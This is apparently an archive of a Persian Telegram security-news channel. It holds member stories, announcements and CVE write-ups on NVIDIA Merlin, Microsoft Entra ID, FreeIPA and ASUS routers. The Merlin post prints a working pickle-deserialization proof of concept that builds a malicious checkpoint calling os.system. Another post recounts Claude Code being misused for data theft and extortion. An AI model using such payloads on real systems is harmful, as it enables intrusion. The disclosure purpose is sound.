TryHackBox ( AI Security )
Open in Telegram
تمام مطالب منتشر شده در کانال صرفاً برای اهداف آموزشی و اطلاعرسانی هستند. هوش مصنوعی مغز دوم نیست، وقتی از مغز اصلی خود استفاده نمیکنید https://t.me/TryHackBox/3018
Show more1 418
Subscribers
+324 hours
+147 days
+6730 days
Posts Archive
Session Fixation and Hijacking
✍️نویسنده
@TryHackBoxStory | The Chaos
#تجربه_شما اگر مایل بودید داستان اشناییتون با این حوزه یا اشنایی با ما رو به اشتراک بگذارید میتونید اینجا کامنت کنید . یا در بات بنویسید : @Unique_exploitbot
شاید جالب و یکم عجیب باشه داستان من
اما مسیر من و باز شدن پا من تو این جهان با یک اتهام شروع شد.
من رشته ام الکترونیک بود و تو این زمینه دوسال هم به جز کارآموزیم کار کردم با جون و دل و چقدرم عاشق این رشته بودم و یادم نمیره چه صبح هایی که هیچ کس نبود و سگ ها با جفت هاشون پرسه میخوردن من میرفتم یعنی یادم نمیره اون صبحی که داشتم میرفتم سگ نره چطور چپ چپ نگام میکرد و میدونستم قطعا توم یک چیزی ترسناک میدید😁
نمیدونست من مثل خودش ترسیدم ولی تا زمانیکه رد بشم به چشاش خیره بودم و اونم😂
به هرحال خروس خون میرفتم و شغال خون خونه بودم ولی بعد از دوسال که رسیدم به اوج کاری خودم و همیشه دوست داشتم تو اوج از کارم خدافظی کنم همینم شد و من دیگه نتونستم ادامه بدم و همه رو با شک مواجه کردم.
بعد از یکسال و اندی از سر ناآگاهی وارد خرید و فروش ارزدیجیتال شدم.
چه پول خوبی هم داشت😂و وسوسه شدم بعد از چهارتا تراکنش یک حس عجیب و غریبی اومد سمتم نکنه ...
بعلع نکنه عملی شد و بعد از قطع همکاری من بعداز چهارتراکنش فتاجان حساب های بنده رو بلوکه کرد و کم کم از اقصا نقاط کشور از من شکایت شد و من شده بودم واسط یک پولشویی مالی،کلاهبردار،هکر
پلیس ها بودن که زنگ میزدن و مثل چی ترسیده بودم 😅 و منی که پام به دادگاه باز نشده بود باز شد.
ولی بالاخره خودم رو جمع و جور کردم و رفتم شکایت کردن از اون فرد که اونم قلابی بود که قطعا هم باید همین می بود.
هیچی دیگه قاضی تهران تیر خلاصی رو زد و منو کرد هکر و از اونجا رسما داستان من شروع شد هرچند از همون ابتدا مسیر افتادم توش که اصلا چیه اینا و... و کم کم خوشمان آمد.
درس هایی که من گرفتم اینا بود:
"هیچ موقع از روی کنجکاوی وارد یک مسیری نشید،نمیگم بده،میخوام بگم قبل از هر اقدامی باید تمام جوانبش رو سنجید و بعد پا توی اون مسیر گذاشت،مگه چقدر فرصت داریم؟
پس تا جایی که ممکنه باید آگاهانه و سنجیده قدم از قدم برداشت.
هیچ اتفاقی هم اتفاقی اتفاق نمی افته و اینم که من افتادم تو این مسیر قطعا اتفاقی نبوده و هیچ چیز دوستان اتفاقی نیست و پشت همه اینها یک درس بزرگی نهفته که میخواد یا ما رو بیدار کنه یا نگاه مون و روش و سبک زندگی مون رو تغییر بده.
حالا یا تغییر میکنی یا تغییرت میده ببین با کدومش راحتتری.
تغییر هیچ وقت آسون نبوده و همیشه توام با درده....
باید منعطف بشی، باید بتونی خودت رو با هر شرایطی،تکرار میکنم با هر شرایطی سازگار کنی،اونوقته که تبدیل میشی به یک انسان ابرقهرمان و مثل کوه قوی و مستحکم میشی "
کم کم از tryhackme , hackthebox رسیدم به این گروه و کانال باحال مخصوصا با رادیوهاتون که تجربه اساتید میگید واقعا کاربردیه برای منی که تازه کارم و فکر میکنم این مسیر هیچ موقع کهنگی نداره و همینه که من شیفته اش شدم.
ذهنیتم رو قوی گسترش دادم و همیشه مستقل بودم.
سعی کردم همیشه مستقل و روی پای خودم بایستم ولی از یکجایی به بعد نشوند سرجام جهان که بشین ببین داری چیکار میکنی با زندگی خودت،که کم کم فهمیدم بله مکانیزم این جهان چطور کار میکنه...
امیدوارم هرکجا که هستید موفق و شاد زیست کنید و کیف دنیا رو ببرید که تا فرصت هست باید عشق و حال کرد با کاری که دوستش دارید.
قطعا هرکسی داستان خودش رو داره و جذابم هست.
ممنون از دوست خوبمون که این پیشنهاد عالی رو دادن و واقعا لذت بخشه خوندن تجربیات آدما چون سراسر درس و آگاهی هست.
#تجربه_شما اگر مایل بودید داستان اشناییتون با این حوزه یا اشنایی با ما رو به اشتراک بگذارید میتونید اینجا کامنت کنید .
+7
درود من خیلی اتفاقی از تلگرام با شما آشنا شدم ، از همون کودکی با جادی آشنا شدم و از اون وبلاگ ساده جادی که کتاب خالق لینوکس رو ترجمه کرده بود و در وبلاگ به اشتراک گذاشته بود ، عاشق دنیای لینوکس و پروژه های متن باز شدم ، تمام این علاقه رو از همون اول با جادی شروع شد که یک کتاب بسیار ساده خالق لینوکس رو به اشتراک گذاشته بود و من کتاب رو بارها خوندم و عاشق دنیای آمریکا شدم و تفکرات آنها.
تمام توزیع های لینوکس رو امتحان میکردم و تسلط کافی روی همه شون پیدا کردم به جز یکی شون اونم توزیع کالی لینوکس بود ، اون زمان ک بقیه نمیدونسن پاکمن چیه من عاشق توزیع مانجارو شدم و تماماً پول توجیبی های خودم رو برای این سرور ها خرج میکردم در زمان که سن سال آنچنان نداشتم یک اسکریپت کد نوشته بودم که ISP رو مستقیم میبرد به سیاست های پورن و من پشت اون اسکریپت کد میزدم.
پام رسید ارمنستان بهترین شکل ممکن این تخصص بهم درآمد خوبی داد، بعد با همون درآمد پام رسید استانبول ترکیه و عشق کردم باز تخصص ام بکار اومد برام.
علاقه ای ک ایجاد شده بود برام از طرف جادی بود.
شاید اینا بدرد یکی بخوره و براش نقشه راه یادگیری مستمر بشه 🌹
@THBS
Repost from رادیو زیرو پاد
دوستان یکسری تغییرات داریم در لوگوی کانال از دوستانی که میتوانند این تغییرات را اعمال کنند به ما پیام دهند :
@THbxSupport
- کانالهای فعال تو زمینه پروکسی و کانفیگ ( پیشنهاد میکنم داشته باشید )...
کانال مخصوص پروکسی :
@ProxySpara
کانال کانفیگ Npv Tunnel :
@NpvSpara
کانال کانفیگ های V2ray :
@V2raySpara
دوستان گرامی
به دلیل شرایط نابسامان فعلی کشور، فعالیتهای ما به طور موقت فعالیتی نخواهیم داشت. تا بهبود اوضاع و بازگشت به شرایط بهتر، پیشنهاد میکنیم از آموزشهای قبلی ما استفاده نمایید.
در این روزهای دشوار، ما نیز در کنار مردم عزیز کشورمان ایستادهایم و با آنها همدردی میکنیم. امیدواریم روزهای روشن و پرامیدی در پیش رو داشته باشیم.
با احترام 🖤
🔖 CVE-2025-23298: RCE در NVIDIA Merlin
📌 بهتازگی یک آسیبپذیری بحرانی در کتابخانه NVIDIA Merlin Transformers4Rec شناسایی شده است که امکان اجرای کد از راه دور (Remote Code Execution – RCE) با سطح دسترسی root را فراهم میکند.
این آسیبپذیری با شناسه CVE-2025-23298 رهگیری میشود و به deserialization ناامن دادهها هنگام بارگذاری مدلها مربوط است.
❓خب NVIDIA Merlin چیست؟
ا ✍️ NVIDIA Merlin یک اکوسیستم Open Source برای ساخت High-Performance Recommendation Systems است.
ماژول Transformers4Rec که بخشی از این اکوسیستم محسوب میشود، برای استفاده از Transformer architectures مدرن در سیستمهای توصیهگر مبتنی بر Sequential Data و Session-based Recommendations طراحی شده است.
💢 ماهیت آسیبپذیری
ریشه آسیبپذیری در تابع زیر قرار دارد:
load_model_trainer_states_from_checkpointاین تابع مسئول بازیابی (restore) وضعیت مدل است، اما بهصورت مستقیم از تابع torch.load() در PyTorch استفاده میکند، بدون اعمال هیچگونه security parameter. تابع torch.load() بهطور داخلی از ماژول pickle در Python استفاده میکند؛ ماژولی که بهطور ذاتی برای پردازش دادههای غیرقابل اعتماد unsafe محسوب میشود. ماژول pickle قادر است هر نوع Python object را serialize و deserialize کند؛ از جمله اشیایی که در زمان deserialization میتوانند کد دلخواه اجرا کنند. این رفتار یک bug نیست، بلکه یک feature است، اما زمانی که فایلهای pickle غیرقابل اعتماد بارگذاری شوند، به یک آسیبپذیری امنیتی جدی تبدیل میشود. 💠 پیادهسازی فنی حمله برای اثبات آسیبپذیری، یک malicious checkpoint file ساخته شده که در زمان load شدن، دستورات دلخواه سیستمعامل را اجرا میکند. این exploit از متد reduce در pickle استفاده میکند تا اجرای دستور را در فرآیند deserialization تحمیل کند. زمانی که قربانی این فایل checkpoint را با تابع آسیبپذیر بارگذاری میکند: تابع os.system بلافاصله اجرا میشود این اجرا قبل از بارگذاری وزنهای مدل اتفاق میافتد دلیل این رفتار آن است که pickle اشیاء را بهصورت ترتیبی deserialize میکند و object مخرب در زمان deserialize شدن model_state_dict فعال میشود. ⭕️ PoC کد زیر یک فایل checkpoint مخرب ایجاد میکند:
import os
import pickle
import torch
class MaliciousObject:
def __reduce__(self):
return (os.system, (
'touch /tmp/pwned_by_zdi',))
# ایجاد شیء مخرب
malicious_object = MaliciousObject()
# ساخت model_state_dict شامل object مخرب
model_state_dict = {
'malicious': malicious_object
}
# ذخیره checkpoint مخرب
torch.save(model_state_dict, 'malicious_checkpoint.pt')
print("فایل مخرب 'malicious_checkpoint.pt' ایجاد شد.")
در صورت بارگذاری این فایل توسط تابع آسیبپذیر:
فایل /tmp/pwned_by_zdi ایجاد میشود
که نشاندهنده اجرای موفق کد دلخواه است
در مقاله اصلی، یک PoC از ZDI (Zero Day Initiative) ارائه شده است، اما به دلیل در دسترس نبودن اسکریپت در زمان نگارش، از آن استفاده نشده و exploit حاضر با تغییرات جزئی بازنویسی شده است
💢 رفع آسیبپذیری
ا ✍️ NVIDIA این آسیبپذیری را در commit b7eaea5 (PR #802) برطرف کرده است:
Security Bulletin رسمی:
https://nvidia.custhelp.com/app/answers/detail/a_id/5683/~/security-bulletin%3A-nvidia-merlin-transformers4rec---august-2025
🔴 تغییرات اصلی Patch:
🔶 تغییر مکانیزم بارگذاری checkpoint
🔶 اضافه شدن validation اضافی روی Python serialized objects
🔶 حذف استفاده مستقیم از torch.load()
🔶 کتابخانه Transformers4Rec اکنون از ماژول serialization.py استفاده میکند که:
🔶 ا deserialization را فقط به Approved Classes محدود میکند
🔶 یک Safe Loading Function با Type Checking پیادهسازی شده است
#آسیبپذیری
@TryHackBoxStory💻باگ بانتی: گروه هکری مرتبط با ایران برای اطلاعات نظامی اسرائیل ۳۰٬۰۰۰ دلار بانتی تعیین کرده است.
https://www.iranintl.com/en/202512164597
@TryHackBoxStory
🔖 CVE-2025-55241: «God Mode» در Microsoft Entra ID
در Microsoft Entra ID (Azure AD) یک آسیبپذیری بحرانی کشف شد که با داشتن تنها یک «Actor token» امکان دستیابی به کنترل کامل مدیریتی بر تمامی tenantsمشتریان مایکروسافت در سطح جهانی را فراهم میکرد.
امتیاز CVSS برابر با 10.0 از سوی Microsoft و 9.8 در NVD ثبت شده است که حداکثر سطح بحرانی محسوب میشود.
📌 آنچه بیش از همه جلب توجه میکند
Universal Master Key:
🔹یک Actor token از یک Tenant آزمایشی = کنترل بر تمام tenants 🔹بدون نیاز به zero-day، فیشینگ یا حملات چندمرحلهای 🔹یک خطای ساده در اعتبارسنجی ارتباطات بینسرویسی 🔹از استارتاپها تا شرکتهای بزرگ هیچکس در امان نبود🔥 ابعاد فاجعه:
🔸خواندن پروفایل کاربران تمام سازمانها 🔸استخراج کلیدهای بازیابی BitLocker 🔸ایجاد حسابهای جدید Global Admin 🔸دسترسی به تمام برنامهها و مجوزها 🔸بدون فعال شدن هیچگونه آلارم یا هشدار امنیتی💢 ماهیت فنی آسیبپذیری مشکل مرزهای Tenant :
ا◽️ Actor tokenها توکنهای داخلی برای احراز هویت بین سرویسهای مایکروسافت هستند ▫️مشکل: عدم وجود boundary check بین tenantها ◽️نتیجه: توکن صادرشده از Tenant A در tenantهای B، C، D و ... نیز معتبر است📟 زنجیره Exploitation:
⚪️ دریافت Actor token از هر tenant آزمایشی ⚪️ استفاده از توکن برای دسترسی به tenant تارگت ⚪️ خواندن دادههای حساس (پروفایلها، کلیدها، مجوزها) ⚪️ ایجاد حسابهای Global Admin ⚪️ کنترل کامل زیرساخت قربانی⭕️ مشکل بنیادی مدل متمرکز قدرت:
🔸مایکروسافت بهعنوان نقطه اعتماد واحد برای میلیونها سازمان 🔸یک خطا = فاجعهای در مقیاس جهانی 🔸تاریخ تکرار میشود: Okta، Cisco، حالا Microsoft 🔸مشکل اصلی نه در کد، بلکه در مفهوم «قدرت مطلق متمرکز» است🔴 وضعیت فعلی و اقدامات دفاعی وضعیت کنونی: 🔸این آسیبپذیری توسط Microsoft در سپتامبر 2025 برطرف شده است 🔸 بررسی وضعیت tenant از طریق Azure Portal:
az account show --query "tenantId"
◽️ممیزی(️audit) حسابهای مدیریتی:
az ad user list --filter "userType eq 'Member'" --query "[].{UPN:userPrincipalName,Role:assignedRoles}"
🔗 منابع:
Issue در Github:
https://github.com/advisories/GHSA-jpqg-vx8m-6w9j
اسکریپت ممیزی زیرساخت:
https://github.com/Spanky-McSpank/CVE-2025-55241-Internal-Audit
📝 توصیهها
◽️ممیزی تمام حسابهای Global Admin که در بازه زمانی وجود آسیبپذیری ایجاد شدهاند ◽️چرخش (Rotation) تمام کلیدها و گواهیهای حساس ◽️تحلیل لاگهای دسترسی برای شناسایی فعالیت مشکوک ◽️بررسی استفاده از فریم ورکهای هویت توزیعشده (Distributed Identity Frameworks)@TryHackBoxStory
🔖 CVE-2025-4404:
⭕ آسیبپذیری بحرانی در FreeIPA - از سطح هاست تا تسلط کامل بر دامنه تنها در یک گام
💠 یک آسیبپذیری بحرانی با امتیاز CVSS 9.1 در FreeIPA - راهکار محبوب مدیریت هویت در محیطهای لینوکسی - شناسایی شده است. این نقص امنیتی امکان افزایش سطح دسترسی از سطح یک هاست تا کنترل کامل دامنه را فراهم میکند.
📌 نکته کلیدی آسیبپذیری
مکانیزم حمله از طریق krbCanonicalName:
▫️FreeIPA یکتابودن (Uniqueness) ویژگی krbCanonicalName را برای حساب admin بهدرستی بررسی نمی کند
▫️مهاجم میتواند یک سرویس با همان نام کانونیکال (Canonical Name) مربوط به admin در REALM ایجاد کند
▫️در صورت موفقیت حمله، یک Kerberos Ticket به نام سرویس اما با اعتبارنامه admin@REALM صادر میشود.
💡 نتیجه: دسترسی کامل مدیریتی (Domain Admin) به دامنه
📟 ماهیت فنی آسیبپذیری
▫️اعتبارسنجی ناکافی ویژگی
های LDAP در FreeIPA
▫️امکان تکرار (Duplicate) شناسههای حیاتی
▫️بهرهبرداری از طریق مکانیزم های استاندارد Kerberos
▫️حمله نیازمند سطح دسترسی بالا است (Privileges Required: High)،
اما دامنه تأثیر تغییر میکند (Scope: Changed)
▫️گستره و شدت مشکل
🔴 محصولات تحت تأثیر Red Hat:
Red Hat Enterprise Linux (تمام نسخهها)
RHEL AUS، E4S، ELS، EUS، TUS
💠 اهمیت برای زیرساخت:
FreeIPA
بهطور گسترده در محیطهای سازمانی لینوکسی استفاده میشود
▫️مدیریت کاربران، گروهها، هاستها و سرویسها
▫️یکپارچگی با Active Directory و سایر سامانههای هویت
▫️نقطه مرکزی احراز هویت در محیطهای Enterprise
@TryHackBoxStory
⭕ اولین حمله سایبری کاملاً خودکار: یک هکر، Claude را به مجرم سایبری تبدیل کرد
💠 شرکت Anthropic اولین مورد ثبتشده از استفاده یک چتبات مبتنی بر هوش مصنوعی برای خودکارسازی کامل یک حمله سایبری را شناسایی کرده است.
در این حمله، یک #هکر با استفاده از Claude Code توانست به ۱۷ شرکت حمله کند و عملاً از این مدل بهعنوان یک مجرم سایبری همهکاره استفاده کند.
💡 کالبدشکافی یک حمله مبتنی بر هوش مصنوعی
💢 نقشهایی که Claude Code در قالب یک مجرم سایبری ایفا کرد:
▫️شناسایی اهداف (Reconnaissance): شناسایی شرکتهای دارای آسیبپذیری برای حمله
▫️توسعه بدافزار: نوشتن بدافزار برای سرقت دادهها
▫️ تحلیل دادههای سرقتشده: دستهبندی و تحلیل فایل های سرقت شده
▫️ارزیابی خسارت: تشخیص میزان حساس بودن دادهها برای اخاذی
▫️تحلیل مالی: بررسی اسناد مالی قربانیان برای تعیین مبلغ باج
▫️تهیه پیامهای تهدید: نگارش ایمیلها و پیام های اخاذی
📍 نتیجه:
📍 یک حمله سایبری کاملاً خودکار، از مرحله شناسایی تارگت تا دریافت باج.
📌 مقیاس عملیات
⭕ ۱۷ سازمان قربانی:
◾️یک پیمانکار صنایع دفاعی
◾️یک نهاد مالی
◾️چند مرکز درمانی
◾️سایر سازمان های حیاتی و حساس
📟 دادههای سرقت شده:
📌 شمارههای تأمین اجتماعی
📌 اطلاعات بانکی
📌 اطلاعات محرمانه پزشکی
📌 دادههای دفاعی مشمول قوانین ITAR وزارت خارجه آمریکا
💰 مبالغ باج:
💵 از ۷۵ هزار دلار تا بیش از ۵۰۰ هزار دلار (بهصورت بیتکوین)
🛠 جزئیات فنی
📌 ابزار استفادهشده: Claude Code (نسخه تخصصی برنامهنویسی، موسوم به Vibe Coding)
⏳ مدت عملیات: ۳ ماه
🗺 موقعیت جغرافیایی: مهاجم خارج از ایالات متحده فعالیت می کرد
💢 روشهای دور زدن محافظتها: استفاده از «تکنیکهای پیچیده» برای عبور از سیستمهای چندلایه امنیتی Anthropic
💢 پیامدها برای صنعت امنیت سایبری
💠 به گفته جیکوب کلاین (Threat Intelligence در Anthropic):
💢 «ما انتظار داریم این مدل حملات رایجتر شود، زیرا هوش مصنوعی بهشدت آستانه ورود به عملیاتهای پیچیده سایبری را کاهش داده است.»
@TryHackBoxStory
https://www.justice.gov/opa/pr/justice-department-announces-actions-combat-two-russian-state-sponsored-cyber-criminal
ارتش سایبری روسیه. آمریکا یک اوکراینی را به حملات سایبری به نفع روسیه متهم میکند وزارت دادگستری آمریکا
به او اتهام حمایت از گروه هکری NoName057(16) وارد شده است.
از جمله اتهامات، دخالت در عملکرد سیستمهای تأمین آب آمریکا، کلاهبرداری، آسیب رساندن به کامپیوترهای محافظت شده و سرقت دادههای شخصی است.
دوبرانوا قبلاً به حمایت از هکتیویستهای CyberArmyofRussia_Reborn (CARR) مظنون بود که طبق اطلاعات وزارت دادگستری آمریکا توسط سازمان اطلاعات نظامی روسیه (GRU) ایجاد و کنترل میشود. امسال او به آمریکا مسترد شده است.
برای همه این موارد بیش از ۳۰ سال زندان تهدیدش میکند. او اتهامات را رد میکند.
#اخبار
@TryHackBoxStory
دوستان ویس چت شروع شد در کانال اصلی جوین شید به ویس چت و این گفتگو رو از دست ندید :
@TryHackBox
Repost from رادیو زیرو پاد
📌 برگزاری جلسه ویس چت : مهندس سجاد تیموری، از اساتید تراز اول امنیت سایبری ایران
با سلام خدمت دوستان و همراهان عزیز،
در راستای ارتقای سطح دانش فنی و آشنایی بیشتر با مباحث امنیت سایبری، قصد داریم جلسهای تخصصی و آموزشی در خصوص واقعیت های محیط کاری امنیت سایبری از جذابیت تا سختی هایی که این محیط دارد به صورت ویس چت برگزار کنیم.
🎙 مهمان ویژه:
مهندس سجاد تیموری
📅 زمان برگزاری: دوشنبه 1404/09/17
📍 پلتفرم: تلگرام (ویس چت)
🕗 ساعت : 19:00
🔖 لینک جلسه :
⁉️ موضوعات ما :
💠 توقعات اشتباه درباره پنتست
💠 استرس ددلاین ها
💬 سوالات خود را درباره واقعیتهای محیط کاری امنیت سایبری از جذابیت تا سختی هایی که این محیط دارد در کامنتهاارسال کنید تا در جلسه به آنها پرداخته شود.
🔔 نکته مهم:
جهت شرکت به موقع جلسه، حتماً کانال تلگرام را چک کنید تا از این جلسه جا نمونید .
➖➖➖➖➖➖➖➖➖➖➖➖➖➖
🆔 @RadioZeroPod
🆔 @TryHackBox
نقص امنیتی جدی در اجزای سرور React
https://react.dev/blog/2025/12/03/critical-security-vulnerability-in-react-server-components
@TryHackBoxStory
https://endoflife.date/
— یه منبع خیلی مفید که اطلاعات تاریخ پایان پشتیبانی (EOL) محصولات مختلف (نرمافزار، OS و غیره) رو جمعآوری کرده. حتماً به بوکمارکها اضافهش کن.
@TryHackBoxStory
ایسوس ( ASUS) یه firmware جدید منتشر کرده که ۹ آسیبپذیری (CVE-2025-59365 تا CVE-2025-59372، CVE-2025-12003 و CVE-2025-59373) رو patch میکنه، از جمله یه خطای critical در روترهای با AiCloud فعال که auth رو bypass میکنه.
ا AiCloud یه ویژگی دسترسی از راه دور مبتنی بر cloud که در بسیاری از روترهای ASUS وجود داره و اونا رو به سرورهای ابری خصوصی برای streaming رسانه از راه دور و ذخیرهسازی ابری تبدیل میکنه.
طبق توضیح سازنده، CVE-2025-59366 میتونه ناشی از یه side effect ناخواسته در عملکرد Samba باشه، که potentially میتونه اجرای توابع خاص بدون مجوز مناسب رو اجازه بده.
مهاجمان از راه دور بدون privileges میتونن از این آسیبپذیری سوءاستفاده کنن، با chaining path traversal و command injection OS در حملات low-complexity که نیاز به تعامل کاربر ندارن.
ایسوس مدلهای دقیق روترهای affected رو مشخص نکرده، فقط نسخههای firmware (3.0.0.4_386، 3.0.0.4_388 و 3.0.0.6_102) رو ذکر کرده و توصیه میکنه فوری به آخرین نسخه update بشن.
شرکت همچنین اقدامات mitigation برای کاربران مدلهای EoL (End-of-Life) که firmware update نمیگیرن رو ذکر کرده.
برای بلاک کردن حملات بالقوه، کاربران توصیه میشه همه سرویسهای accessible از اینترنت رو غیرفعال کنن، از جمله دسترسی از راه دور از WAN، port forwarding، DDNS، VPN server، DMZ، port triggering و FTP، و همچنین دسترسی از راه دور به دستگاههایی که تحت نرمافزار AiCloud vulnerable به CVE-2025-59366 کار میکنن رو محدود کنن.
@TryHackBoxStory
